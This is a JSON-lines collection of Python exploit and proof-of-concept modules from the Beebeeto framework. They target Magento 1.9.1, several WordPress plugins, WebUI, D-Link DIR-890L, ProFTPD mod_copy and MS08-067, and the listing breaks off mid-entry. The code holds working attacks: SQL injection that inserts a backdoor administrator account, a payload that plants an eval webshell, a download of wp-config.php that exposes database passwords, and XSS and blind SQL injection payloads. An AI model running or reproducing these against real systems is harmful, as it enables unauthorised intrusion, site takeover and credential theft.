{"create_date": "2015-05-12 17:20:13", "name": "Magento 1.9.1 \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e Exploit", "level": "\u9ad8\u5371", "batchable": 0, "author": "foundu", "rank": 4, "port": null, "vul_type": "\u4ee3\u7801\u6267\u884c", "tag": "Magento 1.9.1 \u6f0f\u6d1e,Magento RCE \u6f0f\u6d1e,\u7535\u5b50\u5546\u52a1\u7cfb\u7edf\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport base64\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\nfrom utils.generator import generate_user_pwd\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0099',\r\n 'name': 'Magento 1.9.1 \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e Exploit',\r\n 'author': 'foundu',\r\n 'create_date': '2015-05-12',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Magento',\r\n 'vul_version': ['1.9.1'],\r\n 'type': 'Code Execution',\r\n 'tag': ['Magento 1.9.1 \u6f0f\u6d1e', 'Magento RCE \u6f0f\u6d1e', '\u7535\u5b50\u5546\u52a1\u7cfb\u7edf\u6f0f\u6d1e', 'php'],\r\n 'desc': '''\r\n Magento\u5e73\u53f0\u4e2d\u7684\u4e00\u7cfb\u5217\u4e25\u91cd\u6f0f\u6d1e\u6700\u7ec8\u5141\u8bb8\u672a\u7ecf\u6388\u6743\u7684\u653b\u51fb\u8005\u6267\u884c\u4ed6\u4eec\u6240\u9009\u62e9\u7684\r\n web\u670d\u52a1\u5668\u4e0a\u7684\u4efb\u610f\u4ee3\u7801\u3002\r\n ''',\r\n 'references': [\r\n 'http://devdocs.magento.com/guides/m1x/other/appsec-900_addhandler.html',\r\n 'http://www.siph0n.in/exploits.php?id=3829',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n url = args['options']['target']\r\n if url.endswith(\"/\"):\r\n url = url[:-1]\r\n target_url = url + \"/index.php/admin/Cms_Wysiwyg/directive/index/\"\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + target_url\r\n # For demo purposes, I use the same attack as is being used in the wild\r\n SQLQUERY=\"\"\"\r\n SET @SALT = 'rp';\r\n SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));\r\n SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;\r\n INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','[email protected]','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());\r\n INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');\r\n \"\"\"\r\n # Put the nice readable queries into one line,\r\n # and insert the username:password combinination\r\n password = generate_user_pwd.password()\r\n query = SQLQUERY.replace(\"\\n\", \"\").format(username=\"beebeeto\", password=password)\r\n pfilter = \"popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}\".format(query)\r\n r = requests.post(target_url, data={\"___directive\":\r\n \"e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ\",\r\n \"filter\": base64.b64encode(pfilter),\r\n \"forwarded\": 1})\r\n if r.ok:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = target_url\r\n args['poc_ret']['message'] = 'Admin(user/pwd): beebeeto/{})'.format(password)\r\n return args\r\n\r\n verify = exploit\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Magento\u5e73\u53f0\u4e2d\u7684\u4e00\u7cfb\u5217\u4e25\u91cd\u6f0f\u6d1e\u6700\u7ec8\u5141\u8bb8\u672a\u7ecf\u6388\u6743\u7684\u653b\u51fb\u8005\u6267\u884c\u4ed6\u4eec\u6240\u9009\u62e9\u7684web\u670d\u52a1\u5668\u4e0a\u7684\u4efb\u610f\u4ee3\u7801\u3002", "app_name": "Magento", "id": "poc-2015-0099", "layer4_protocol": null}
{"create_date": "2015-05-07 10:18:51", "name": "WordPress MiwoFTP <=1.0.5 \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "range", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "Wordpress MiwoFTP\u63d2\u4ef6\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = { \r\n # poc\u76f8\u5173\u4fe1\u606f \r\n 'poc': { \r\n 'id': 'poc-2015-0096',\r\n 'name': 'WordPress MiwoFTP <=1.0.5 \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC',\r\n 'author': 'range',\r\n 'create_date': '2015-05-05',\r\n }, \r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f \r\n 'protocol': { \r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n }, \r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f \r\n 'vul': { \r\n 'app_name': 'Wordpress',\r\n 'vul_version': ['<=1.0.5',], \r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['Wordpress MiwoFTP\u63d2\u4ef6\u6f0f\u6d1e', 'php'],\r\n 'desc': '''\r\n WordPress MiwoFTP Plugin <= 1.0.5 - Arbitrary File Download\r\n ''',\r\n 'references': ['https://www.exploit-db.com/exploits/36801/', \r\n ], \r\n }, \r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = ('/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download'\r\n '&item=wp-config.php&order=name&srt=yes')\r\n verify_url = args['options']['target'] + payload\r\n request = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n response = urllib2.urlopen(request)\r\n reg = re.compile(\"DB_PASSWORD\")\r\n if reg.findall(response.read()):\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n \r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n \r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "WordPress MiwoFTP Plugin <= 1.0.5 - Arbitrary File Download", "app_name": "WordPress", "id": "poc-2015-0096", "layer4_protocol": null}
{"create_date": "2015-04-28 16:09:14", "name": "WebUI 1.5b6 /mainfile.php \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC & Exploit", "level": "\u9ad8\u5371", "batchable": 1, "author": "7rac3", "rank": 4, "port": null, "vul_type": "\u4ee3\u7801\u6267\u884c", "tag": "WebUI\u6f0f\u6d1e,/mainfile.php,Remote Code Execution Vulnerability,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n 'poc':{\r\n 'id': 'poc-2015-0094',\r\n 'name': 'WebUI 1.5b6 /mainfile.php \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC & Exploit',\r\n 'author': '7rac3',\r\n 'create_date': '2015-4-27',\r\n },\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n 'vul':{\r\n 'app_name': 'WebUI',\r\n 'vul_version': ['1.5b6'],\r\n 'type': 'Code Execution',\r\n 'tag': ['WebUI\u6f0f\u6d1e', '/mainfile.php', 'Remote Code Execution Vulnerability', 'php'],\r\n 'desc': 'WebUI 1.5b6 has code execution in mainfile.php',\r\n 'references': ['https://www.exploit-db.com/exploits/36821/',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls,args):\r\n target = args['options']['target']\r\n payload = '/mainfile.php?username=RCE&password=BB2&_login=1&Logon=%27;echo%20md5(111);%27'\r\n vul_url = target + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: '+ vul_url\r\n response = requests.get(vul_url)\r\n text = response.content\r\n if '698d51a19d8a121ce581499d7b701668' in text:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = vul_url\r\n return args\r\n\r\n\r\n @classmethod\r\n def exploit(cls,args):\r\n target = args['options']['target']\r\n payload = '/mainfile.php?username=RCE&password=BB2&_login=1&Logon=%27;echo%20md5(111);@eval($_POST[bb2]);%27'\r\n vul_url = target + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: '+ vul_url\r\n response = requests.get(vul_url)\r\n text = response.content\r\n if '698d51a19d8a121ce581499d7b701668' in text:\r\n args['success'] = True\r\n args['poc_ret']['webshell'] = vul_url\r\n args['poc_ret']['password'] = 'bb2'\r\n return args\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = Mypoc()\r\n pprint(mp.run())", "desc": "WebUI 1.5b6 has code execution in mainfile.php", "app_name": "Other", "id": "poc-2015-0094", "layer4_protocol": null}
{"create_date": "2015-04-27 21:32:04", "name": "Wordpress < 4.1.2 /wp-comments-post.php \u5b58\u50a8\u578bXSS\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "tmp", "rank": 5, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Wordpress\u5b58\u50a8\u578bXSS\u6f0f\u6d1e,/wp-comments-post.php,Cross Site Scripting,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport random\r\nimport string\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0092',\r\n 'name': 'Wordpress < 4.1.2 /wp-comments-post.php \u5b58\u50a8\u578bXSS\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2015-04-26',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Wordpress',\r\n 'vul_version': ['<4.1.2'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['Wordpress\u5b58\u50a8\u578bXSS\u6f0f\u6d1e', '/wp-comments-post.php', 'Cross Site Scripting', 'php'],\r\n 'desc': '''\r\n \u8be5\u95ee\u9898\u7531 mysql \u7684\u4e00\u4e2a\u7279\u6027\u5f15\u8d77\uff0c\u5728 mysql \u7684 utf8 \u5b57\u7b26\u96c6\u4e2d\uff0c\u4e00\u4e2a\u5b57\u7b26\u75311~3\u4e2a\u5b57\u8282\u7ec4\u6210\uff0c\r\n \u5bf9\u4e8e\u5927\u4e8e3\u4e2a\u5b57\u8282\u7684\u5b57\u7b26\uff0cmysql \u4f7f\u7528\u4e86 utf8mb4 \u7684\u5f62\u5f0f\u6765\u5b58\u50a8\u3002\r\n \u5982\u679c\u6211\u4eec\u5c06\u4e00\u4e2a utf8mb4 \u5b57\u7b26\u63d2\u5165\u5230 utf8 \u7f16\u7801\u7684\u5217\u4e2d\uff0c\u90a3\u4e48\u5728mysql\u7684\u975estrict mode\u4e0b\uff0c\r\n \u4ed6\u4f1a\u5c06\u540e\u9762\u7684\u5185\u5bb9\u622a\u65ad\uff0c\u5bfc\u81f4\u6211\u4eec\u53ef\u4ee5\u5229\u7528\u8fd9\u4e00\u7f3a\u9677\u5b8c\u6210 XSS \u653b\u51fb\u3002\r\n ''',\r\n 'references': [\r\n 'https://wordpress.org/news/2015/04/wordpress-4-1-2/',\r\n 'https://cedricvb.be/post/wordpress-stored-xss-vulnerability-4-1-2/',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n target = args['options']['target']\r\n verify_url = target + \"/wp-comments-post.php\"\r\n rand_str = lambda length: ''.join(random.sample(string.letters, length))\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n print '[*] Checking...'\r\n try:\r\n post_id = re.search(r'post-(?P<post_id>[\\d]+)',\r\n requests.get(target).content).group('post_id')\r\n except:\r\n if args['options']['verbose']:\r\n print '[-] Not WordPress'\r\n return args\r\n ttys = \"test<blockquote cite='%s onmouseover=alert(1)// \\xD8\\x34\\xDF\\x06'>\"\r\n flag = rand_str(10)\r\n payload = {\r\n 'author': rand_str(10),\r\n 'email': '%s@%s.com' % (rand_str(10), rand_str(3)),\r\n 'url': 'http://www.beebeeto.com',\r\n 'comment': ttys % flag,\r\n 'comment_post_ID': post_id,\r\n 'comment_parent': 0,\r\n }\r\n if args['options']['verbose']:\r\n print '[*] Send Payload: %s' % payload['comment']\r\n content = requests.post(verify_url, data=payload).content\r\n if '<blockquote cite=’%s onmouseover=alert(1)' % flag in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = '%s/?p=%s' % (target, post_id)\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == \"__main__\":\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u8be5\u95ee\u9898\u7531 mysql \u7684\u4e00\u4e2a\u7279\u6027\u5f15\u8d77\uff0c\u5728 mysql \u7684 utf8 \u5b57\u7b26\u96c6\u4e2d\uff0c\u4e00\u4e2a\u5b57\u7b26\u75311~3\u4e2a\u5b57\u8282\u7ec4\u6210\uff0c\r\n\u5bf9\u4e8e\u5927\u4e8e3\u4e2a\u5b57\u8282\u7684\u5b57\u7b26\uff0cmysql \u4f7f\u7528\u4e86 utf8mb4 \u7684\u5f62\u5f0f\u6765\u5b58\u50a8\u3002\r\n\u5982\u679c\u6211\u4eec\u5c06\u4e00\u4e2a utf8mb4 \u5b57\u7b26\u63d2\u5165\u5230 utf8 \u7f16\u7801\u7684\u5217\u4e2d\uff0c\u90a3\u4e48\u5728mysql\u7684\u975estrict mode\u4e0b\uff0c\r\n\u4ed6\u4f1a\u5c06\u540e\u9762\u7684\u5185\u5bb9\u622a\u65ad\uff0c\u5bfc\u81f4\u6211\u4eec\u53ef\u4ee5\u5229\u7528\u8fd9\u4e00\u7f3a\u9677\u5b8c\u6210 XSS \u653b\u51fb\u3002", "app_name": "WordPress", "id": "poc-2015-0092", "layer4_protocol": null}
{"create_date": "2015-04-24 00:15:36", "name": "D-link DIR-890L /HNAP1 \u672a\u6388\u6743\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "tmp", "rank": 3, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "D-link DIR-890L\u7cfb\u7edf\u6f0f\u6d1e,/HNAP1\u6f0f\u6d1e,\u8def\u7531\u5668\u6f0f\u6d1ePOC", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0090',\r\n 'name': 'D-link DIR-890L /HNAP1 \u672a\u6388\u6743\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2015-04-24',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'D-link',\r\n 'vul_version': ['DIR-890L'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['D-link DIR-890L\u7cfb\u7edf\u6f0f\u6d1e', '/HNAP1\u6f0f\u6d1e', '\u8def\u7531\u5668\u6f0f\u6d1ePOC'],\r\n 'desc': 'D_link /HNAP1 unauthenticated remote query information',\r\n 'references': ['http://www.freebuf.com/vuls/64521.html',\r\n 'http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/'],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = '%s/HNAP1/' % args['options']['target']\r\n soap = {'SOAPAction': '\"http://purenetworks.com/HNAP1/GetWanSettings\"'}\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n req = requests.get(verify_url, headers=soap)\r\n if req.status_code == 200 and 'xmlns:soap' in req.content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "D-LINK", "id": "poc-2015-0090", "layer4_protocol": null}
{"create_date": "2015-04-22 13:55:00", "name": "WordPress NEX-Forms 3.0 SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 0, "author": "Sh4dow", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165\u6f0f\u6d1e", "tag": "WordPress SQL\u6ce8\u5165\u6f0f\u6d1e,NEX-Forms\u63d2\u4ef6\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport time\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0089',\r\n 'name': 'WordPress NEX-Forms 3.0 SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'Sh4dow',\r\n 'create_date': '2015-04-22',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'WordPress',\r\n 'vul_version': ['3.0'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['WordPress SQL\u6ce8\u5165\u6f0f\u6d1e', 'NEX-Forms\u63d2\u4ef6\u6f0f\u6d1e', 'php'],\r\n 'desc': '''\r\n There are sql injection vulnerabilities in NEX-Forms Plugin\r\n which could allow the attacker to execute sql queries into database\r\n ''',\r\n 'references': ['https://www.exploit-db.com/exploits/36800/',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target']\r\n payloads = {'/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=10 AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)',\r\n '/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1 and sleep(5)',\r\n '/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=10 and sleep(5)'\r\n }\r\n for payload in payloads:\r\n verify_url += payload\r\n start_time = time.time()\r\n if args['options']['verbose']:\r\n print '[*]Request URL ' + verify_url\r\n req = requests.get(verify_url).content\r\n if time.time() - start_time > 5:\r\n args['options']['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n break\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "There are sql injection vulnerabilities in NEX-Forms Plugin\r\nwhich could allow the attacker to execute sql queries into database", "app_name": "WordPress", "id": "poc-2015-0089", "layer4_protocol": null}
{"create_date": "2015-04-20 22:27:48", "name": "ProFTPD <=1.3.5 mod_copy \u672a\u6388\u6743\u6587\u4ef6\u590d\u5236\u6f0f\u6d1e(CVE-2015-3306) POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "Evi1m0", "rank": 4, "port": null, "vul_type": "\u5176\u4ed6\u7c7b\u578b", "tag": "ProFTPD\u6f0f\u6d1e,mod_copy\u6f0f\u6d1e,CVE-2015-3306", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport random\r\nimport telnetlib\r\n\r\nfrom baseframe import BaseFrame\r\nfrom utils.http import http\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0088',\r\n 'name': 'ProFTPD <=1.3.5 mod_copy \u672a\u6388\u6743\u6587\u4ef6\u590d\u5236\u6f0f\u6d1e(CVE-2015-3306) POC',\r\n 'author': 'evi1m0',\r\n 'create_date': '2015-04-20',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'ftp',\r\n 'port': [21],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'ProFTPD',\r\n 'vul_version': ['<=1.3.5'],\r\n 'type': 'Other',\r\n 'tag': ['ProFTPD\u6f0f\u6d1e', 'mod_copy\u6f0f\u6d1e', 'CVE-2015-3306'],\r\n 'desc': '''\r\n This candidate has been reserved by an organization or individual that will use it when announcing\r\n a new security problem. When the candidate has been publicized, the details for this candidate will be\r\n provided.\r\n ''',\r\n 'references': ['http://bugs.proftpd.org/show_bug.cgi?id=4169',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n ip = http.transform_target_ip(http.normalize_url(args['options']['target']))\r\n if args['options']['verbose']:\r\n print '[*] {} Connecting...'.format(ip)\r\n tn = telnetlib.Telnet(ip, port=21, timeout=15)\r\n tn.write('site help\\r\\n')\r\n tn.write('quit\\n')\r\n status = tn.read_all()\r\n if 'CPTO' in status and 'CPFR' in status:\r\n if args['options']['verbose']:\r\n print '[*] Find CPTO & CPFR'\r\n tn = telnetlib.Telnet(ip, port=21, timeout=15)\r\n filename_tmp = '/tmp/evi1m0_%s.sh'%random.randint(1, 1000)\r\n tn.write('site cpto evi1m0@beebeeto\\n')\r\n tn.write('site cpfr /proc/self/fd/3\\n')\r\n tn.write('site cpto %s\\n'%filename_tmp)\r\n tn.write('quit\\n')\r\n result = tn.read_all()\r\n if 'Copy successful' in result:\r\n args['success'] = True\r\n args['poc_ret']['vul_target'] = ip\r\n args['poc_ret']['filename'] = filename_tmp\r\n return args\r\n\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "This candidate has been reserved by an organization or individual that will use it when announcing\r\na new security problem. When the candidate has been publicized, the details for this candidate will be\r\nprovided.", "app_name": "ProFTPD", "id": "poc-2015-0088", "layer4_protocol": null}
{"create_date": "2015-04-20 18:07:05", "name": "Wordpress Ajax Store Locator <= 1.2 SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "1024", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "WordPress\u63d2\u4ef6\u6f0f\u6d1e,/wp-admin/admin-ajax.php,SQL Injection,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0087',\r\n 'name': 'Wordpress Ajax Store Locator <= 1.2 SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': '1024',\r\n 'create_date': '2015-04-20',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'WordPress',\r\n 'vul_version': ['<=1.2'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['WordPress\u63d2\u4ef6\u6f0f\u6d1e', '/wp-admin/admin-ajax.php', 'SQL Injection', 'php'],\r\n 'desc': 'The \"sl_dal_searchlocation_cbf\" ajax function is affected from SQL Injection vulnerability',\r\n 'references': ['https://www.exploit-db.com/exploits/36777/'],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n url = args['options']['target']\r\n payload = ('wp-admin/admin-ajax.php?action=sl_dal_searchlocation&funMethod=SearchStore'\r\n '&Location=Social&StoreLocation=1~1+UNION+SELECT+1,2,3,4,md5(233),6,7,8,9,10'\r\n ',11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39--')\r\n verify_url = url + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = requests.get(url).content\r\n if 'e165421110ba03099a1c0393373c5b43' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "The \"sl_dal_searchlocation_cbf\" ajax function is affected from SQL Injection vulnerability", "app_name": "WordPress", "id": "poc-2015-0087", "layer4_protocol": null}
{"create_date": "2015-04-19 20:11:06", "name": "MS08-067 NetAPI32.dll \u8fdc\u7a0b\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e(CVE-2008-4250) POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "tmp", "rank": 3, "port": null, "vul_type": "\u7f13\u51b2\u533a\u6ea2\u51fa", "tag": "Windows\u6f0f\u6d1e,NetAPI32.dll\u6f0f\u6d1e,CVE-2008-4250,ms08-067", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport socket\r\n\r\nfrom baseframe import BaseFrame\r\nfrom utils.http import http\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0085',\r\n 'name': 'MS08-067 NetAPI32.dll \u8fdc\u7a0b\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e(CVE-2008-4250) POC',\r\n 'author': 'tmp',\r\n 'create_date': '2015-04-18',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'SMB',\r\n 'port': [445],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Windows',\r\n 'vul_version': ['*'],\r\n 'type': 'Buffer Overflow',\r\n 'tag': ['Windows\u6f0f\u6d1e', 'NetAPI32.dll\u6f0f\u6d1e', 'CVE-2008-4250', 'ms08-067'],\r\n 'desc': '''\r\n MS08-067\u6f0f\u6d1e\u7684\u5168\u79f0\u4e3a\u201cWindows 